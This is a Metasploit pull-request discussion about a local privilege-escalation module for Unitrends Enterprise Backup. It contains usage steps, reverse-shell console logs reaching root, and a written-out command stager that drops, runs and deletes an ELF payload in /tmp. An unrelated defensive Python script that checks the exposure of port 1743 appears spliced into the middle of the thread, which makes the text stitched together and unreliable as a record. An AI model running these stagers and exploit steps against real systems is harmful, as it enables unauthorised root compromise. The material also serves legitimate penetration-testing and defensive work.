
Ueb local privesc #9946

Merged
merged 2 commits into rapid7:master on Nov 28, 2018

6 participants
@synthsec
Contributor

synthsec commented Apr 27, 2018

Vulnerable Application

Unitrends UEB 9/10 local privesc

Still works on the demo version of the application available here:
http://free-vmware-backup.unitrends.com/Unitrends-Free-VMware.ova

This exploit leverages the bpserverd proprietary protocol to issue commands
as root.

Verification Steps

  1. Get a shell with exploit/linux/http/ueb10_api_systems
  2. use exploit/linux/local/ueb_priv_esc
  3. set session [SESSION]
  4. exploit
  5. A highpriv meterpreter session should have been opened successfully

Scenarios

UEB 10.0 on CentOS 6.5

msf > use exploit/linux/local/ueb_priv_esc
msf exploit(linux/local/ueb_priv_esc) > set session 4
session => 4
msf exploit(linux/local/ueb_priv_esc) > exploit

[*] Started reverse TCP handler on 15.0.0.177:4444
[*] Writing payload executable to '/tmp/pEFoythF'
[*] Writing privesc script to '/tmp/CTZSovJR'
[*] Fixing permissions
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
[+] Deleted /tmp/pEFoythF
[+] Deleted /tmp/CTZSovJR

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

synthsec added some commits Apr 27, 2018

@bcoles

Contributor

bcoles commented Apr 27, 2018

Is there a reason this was written as a local exploit?

Based on the documentation, it's reasonable to expect that port 1743/tcp will be exposed externally.

It would be more useful to make this a remote exploit. Users can pivot to the 127.0.0.1 interface via an existing session for privesc purposes.

There's also an existing Metasploit module ueb9_bpserverd for Unitrends UEB 9 which looks very similar. If the vulnerability has changed since version 9, it might make more sense to implement a target for version 10 in the existing module.

@synthsec

Contributor

synthsec commented Apr 27, 2018

I think it's probably a good call to roll the UEB 10 remote exploit into the existing UEB 9 remote HTTP exploit. This one might warrant its own submission though, just because it's mechanically a bit different than the existing bpserverd exploit despite looking very similar.

Basically, Unitrends patched the vulnerability exploited by the existing bpserverd module by removing remote access to port 1743. It's still listening on loopback, though, so once a low priv shell is established using ueb10_api_systems, this will get you root.
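The difference the two comments above turn on, a bpserverd listener on 1743/tcp that other hosts can reach versus one restricted to loopback, is something a defender can verify on the appliance itself from the kernel socket table. The following Python script is an added example written for this discussion; it is not code from the ueb_priv_esc module, from Metasploit or from Unitrends. It assumes a Linux host where /proc/net/tcp is readable and a little-endian CPU such as x86 (the address encoding depends on host byte order); the two sample socket tables are constructed for illustration, not captured from an appliance.

```python
"""Classify how a TCP listener is exposed by reading the kernel socket table.

Added example for this discussion, not code from the ueb_priv_esc module or
from Unitrends. Assumes Linux (/proc/net/tcp) on a little-endian CPU such as
x86; the sample socket tables below are constructed for illustration.
"""
import socket
import struct
from pathlib import Path

BPSERVERD_PORT = 1743      # the port named in the discussion above
TCP_LISTEN = "0A"          # socket state code for LISTEN in /proc/net/tcp


def parse_proc_addr(hexaddr: str) -> tuple:
    """Convert a /proc/net/tcp address such as '0100007F:06CF' to ('127.0.0.1', 1743).

    The host part is a 32-bit value written in host byte order, hence '<I'
    (little-endian, the assumption stated above).
    """
    host_hex, port_hex = hexaddr.split(":")
    host = socket.inet_ntoa(struct.pack("<I", int(host_hex, 16)))
    return host, int(port_hex, 16)


def listening_sockets(table: str) -> list:
    """Return (ip, port) for every socket in LISTEN state in a /proc/net/tcp dump.

    The column header is skipped naturally: its state column reads 'st', not '0A'.
    """
    sockets = []
    for line in table.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[3] == TCP_LISTEN:
            sockets.append(parse_proc_addr(fields[1]))
    return sockets


def exposure(table: str, port: int = BPSERVERD_PORT) -> str:
    """Report 'not-listening', 'loopback-only' or 'external' for the given port.

    'external' means the socket is bound to a non-loopback address (including
    the 0.0.0.0 wildcard). Whether it is actually reachable still depends on
    host and network firewall rules, which this check does not see.
    """
    binds = [ip for ip, p in listening_sockets(table) if p == port]
    if not binds:
        return "not-listening"
    if all(ip.startswith("127.") for ip in binds):
        return "loopback-only"
    return "external"


# Constructed sample tables (not captured from a real appliance).
# Port 0x06CF is 1743, 0x01BB is 443; 0100007F is 127.0.0.1 in host order.
HEADER = ("  sl  local_address rem_address   st tx_queue rx_queue tr tm->when "
          "retrnsmt   uid  timeout inode")
TAIL = ("00000000:00000000 00:00000000 00000000     0        0 12345 1 "
        "0000000000000000 100 0 0 10 0")
SAMPLE_LOOPBACK = "\n".join([
    HEADER,
    f"   0: 0100007F:06CF 00000000:0000 0A {TAIL}",   # bpserverd bound to loopback
    f"   1: 00000000:01BB 00000000:0000 0A {TAIL}",   # HTTPS bound to all interfaces
    f"   2: 0100007F:06CF 0100007F:C4A0 01 {TAIL}",   # ESTABLISHED connection, ignored
])
SAMPLE_WILDCARD = "\n".join([
    HEADER,
    f"   0: 00000000:06CF 00000000:0000 0A {TAIL}",   # bpserverd bound to 0.0.0.0
])


def check_live_host(port: int = BPSERVERD_PORT) -> str:
    """Run the classification against this machine's own IPv4 socket table."""
    return exposure(Path("/proc/net/tcp").read_text(), port)


if __name__ == "__main__":
    print("constructed loopback table :", exposure(SAMPLE_LOOPBACK))
    print("constructed wildcard table :", exposure(SAMPLE_WILDCARD))
```

On a live appliance, call `check_live_host()` (and run the same parser over /proc/net/tcp6 if the service could be bound on IPv6). A result of "loopback-only" matches the patched behaviour described above, where the service is reachable only from a process already on the box; "external" means the bind alone does not protect the port, so the host firewall rules also have to be reviewed before concluding that 1743/tcp is unreachable from the network.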

@bcoles

Contributor

bcoles commented Apr 27, 2018

So the vulnerability hasn't changed?

Perhaps others will disagree with me (paging @wvu-r7 @sempervictus), but I think the existing module is sufficient, although it could use a clean up, and some additional documentation to address the firewall changes in version 10.

Using the existing module implementation and pivoting over the session, with route add 127.0.0.1 255.255.255.255 1, is much cleaner. It saves a file write, and doesn't require python to be installed and in $PATH.

Admittedly, pivoting only works with Meterpreter sessions, and doesn't work with all Meterpreters (i.e., Java Meterpreter).

If a local version of the module were to be written, it would be nice to use native Rex sockets, which would also avoid a file write.

@asoto-r7

Contributor

asoto-r7 commented May 23, 2018

@synthsec: As @bcoles mentioned, we have a similar module: exploit/linux/misc/ueb9_bpserverd. I would propose that we expand upon the existing ueb9_bpserverd module.

Would you take a look at merging this with ueb9_bpserverd?

@bwatters-r7

Contributor

bwatters-r7 commented Jun 13, 2018

The more I look at this, the less sure I am about merging it in with the other ueb module. Do we want to add a local privesc exploit to a non-local exploit module as a target, and then assume that users will 'figure it out' when looking for something to use? There are a lot of odd corners in metasploit, so that might be completely normal, but it seems like that's asking for this code to get forgotten. I do agree with @bcoles that this would be improved without the file write, though on the other hand, when I search for UEB in Google, the first hit is Urdu Educational Board in India..... A second Google check suggested that ~1,000 companies use Unitrends; having this exploit would help people, but do we need to spend significant time optimizing something that already works? I'm more than happy to concede on any of these points, and I would be thrilled if someone wants to improve the existing module and polish up this one, but barring that, maybe we should just test and land it? It is useful, it works, and it offers an ability we do not have.

@bcoles

Contributor

bcoles commented Jun 14, 2018

@bwatters-r7 I vote for ship it :shipit:

[...] merging it in with the other ueb module. Do we want to add a local privesc exploit to a non-local exploit module as a target, and then assume that users will 'figure it out' when looking for something to use?

I'm suggesting that using network pivots route add in lieu of this module would be stealthier and would prevent code duplication in the framework. However, network pivots require a meterpreter session rather than a shell command session, which adds validity to this PR as it "offers an ability we do not have".

On the topic of using Rex sockets to communicate with the local network interface, instead of dropping a file to disk, I still prefer Rex sockets, however I'm not going to implement it. There are zero examples of this code pattern in the framework from which the PR author can draw. So ship it.

@h00die

Contributor

h00die commented Sep 10, 2018

What is the state of this?

I believe a v10 http target needs to be created for this to be relevant. On my UEB 9.2.0 image, the http module gives me root, meaning there's no need to priv esc.

I just downloaded a new ova, and it's 10.2, meaning #9945 isn't vulnerable to it.
I can assist with getting a v10 http target created, but would need someone to host 10.0 for me to download to verify.

@h00die

Contributor

h00die commented Sep 10, 2018

Here is my first attempt (completely untested) at rolling v9 and v10 together.

h00die@589fb4b

@h00die

Contributor

h00die commented Sep 11, 2018

Looks like the v10 exploit gives apache privs on v9.... awesome sauceum, I'm going to go ahead and PR this (had a slight change). Then I'll start looking into the LPE

h00die referenced this pull request Sep 11, 2018: Upgrade UEB module with version 10 exploit #10616 (merged)
@h00die

Contributor

h00die commented Sep 11, 2018

Finished testing the v9 and v10 integration, PR is up for review. Once that lands I'll start looking at this LPE more. Feel free to review!

@h00die h00die self-assigned this Oct 13, 2018

@h00die

Contributor

h00die commented Oct 13, 2018

This is working for me on my 9.2 box.
Note that this had to be rebased to use the updated ueb_api_rce and set target so that it uses the lower privs exploit.

msf5 exploit(linux/http/ueb_api_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:443 - Sending requests to UEB...
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0'>>/tmp/hBrpU", "printf '\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0'>>/tmp/hBrpU", "printf '\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\2\\165\\150'>>/tmp/hBrpU", "printf '\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0'>>/tmp/hBrpU", "printf '\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301'>>/tmp/hBrpU", "printf '\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170\\20\\133\\211\\341\\231\\266\\14\\260\\3\\315\\200\\205\\300\\170'>>/tmp/hBrpU", "printf '\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/hBrpU ; chmod +x /tmp/hBrpU ; /tmp/hBrpU ; rm -f /tmp/hBrpU"]
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42082) at 2018-10-13 14:18:15 -0400

getuid
[*] Command Stager progress - 126.63% done (1051/830 bytes)

meterpreter > 
meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(linux/http/ueb_api_rce) > use exploit/linux/local/ueb_priv_esc 
msf5 exploit(linux/local/ueb_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ueb_priv_esc) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Writing payload executable to '/tmp/NQXCjMKV'
[*] Writing privesc script to '/tmp/cTSoCZuPF'
[*] Fixing permissions
[*] Sending stage (861480 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:42085) at 2018-10-13 14:19:14 -0400
[+] Deleted /tmp/NQXCjMKV
[+] Deleted /tmp/cTSoCZuPF

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
Background session 2? [y/N]  
msf5 exploit(linux/local/ueb_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: /usr/bp
================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40755/rwxr-xr-x   4096   dir   2017-03-03 16:46:26 -0500  AgentReqScript
100444/r--r--r--  17979  fil   2017-03-03 16:20:06 -0500  EULA.pdf
100444/r--r--r--  7479   fil   2017-03-03 16:20:06 -0500  EULA.txt
100444/r--r--r--  18010  fil   2017-03-03 16:20:06 -0500  GPL
40755/rwxr-xr-x   4096   dir   2017-03-07 14:53:40 -0500  app-defaults
40755/rwxr-xr-x   4096   dir   2017-03-07 14:53:15 -0500  baremetal
40755/rwxr-xr-x   12288  dir   2017-10-18 18:20:30 -0400  bin
100644/rw-r--r--  67     fil   2017-03-07 14:54:12 -0500  bp_VERS
40755/rwxr-xr-x   4096   dir   2017-03-07 14:54:12 -0500  bpinit
40755/rwxr-xr-x   4096   dir   2017-03-03 16:46:26 -0500  catalog.dir
40755/rwxr-xr-x   4096   dir   2017-03-07 14:54:10 -0500  cdrom_images
40700/rwx------   4096   dir   2018-10-13 14:05:59 -0400  data
40755/rwxr-xr-x   4096   dir   2017-03-07 14:54:09 -0500  db
40755/rwxr-xr-x   4096   dir   2018-10-13 14:06:01 -0400  etc
40755/rwxr-xr-x   4096   dir   2017-03-07 14:53:51 -0500  images
40755/rwxr-xr-x   4096   dir   2017-03-07 14:54:13 -0500  info.dir
40755/rwxr-xr-x   4096   dir   2017-03-07 14:53:52 -0500  lcdman.dir

@h00die

Contributor

h00die commented Oct 13, 2018

Looking at this code, I did think about commenting that the hard-coded 127.0.0.1 could be changed to an option, which would allow for the scenario of exploiting UEB on an internal network, pivoted through a meterp. However, the current code executes a binary which is written to local disk, therefore preventing that from working. If it was changed to use a command stager instead it could then be used either way. However, then it feels like it really should be in a remote exploit.

I vote, at this point, to leave it as is. I think the probability of NEEDING this to work in a more dynamic fashion is outweighed by the fact that there are two remote exploits already that cover the same territory and it would therefore be redundant and unnecessary.

Based on the lack of response from #10616 I have a bad feeling that @synthsec isn't looking at this any more and won't get around to making these changes anyways :(

@h00die

Contributor

h00die commented Nov 10, 2018

@synthsec ping, you still around and interested in getting this module fixed up to be landed?

@h00die h00die added the delayed label Nov 15, 2018

h00die referenced this pull request Nov 16, 2018: UEB updates per review #1 (closed)

@h00die

Contributor

h00die commented Nov 16, 2018

Please see synthsec#1 as it incorporates all of the requested changes.

@h00die h00die merged commit 4d65174 into rapid7:master Nov 28, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully ran sanity checks.
Metasploit Automation - Test Execution: Successfully ran `autoPayloadTest.py`.
continuous-integration/travis-ci/pr: The Travis CI build passed

h00die added a commit that referenced this pull request Nov 28, 2018

@h00die

Contributor

h00die commented Nov 28, 2018

Ended up making the changes due to the author being unresponsive.
38a99ac
4af5ab3

msjenkins-r7 added a commit that referenced this pull request Nov 28, 2018

@h00die

Contributor

h00die commented Nov 28, 2018

Release Notes

The exploits/linux/local/ueb_priv_esc module has been added to the framework. This adds a local privilege escalation to Unitrends Enterprise Backup by sending a known exploit to the local service listener.
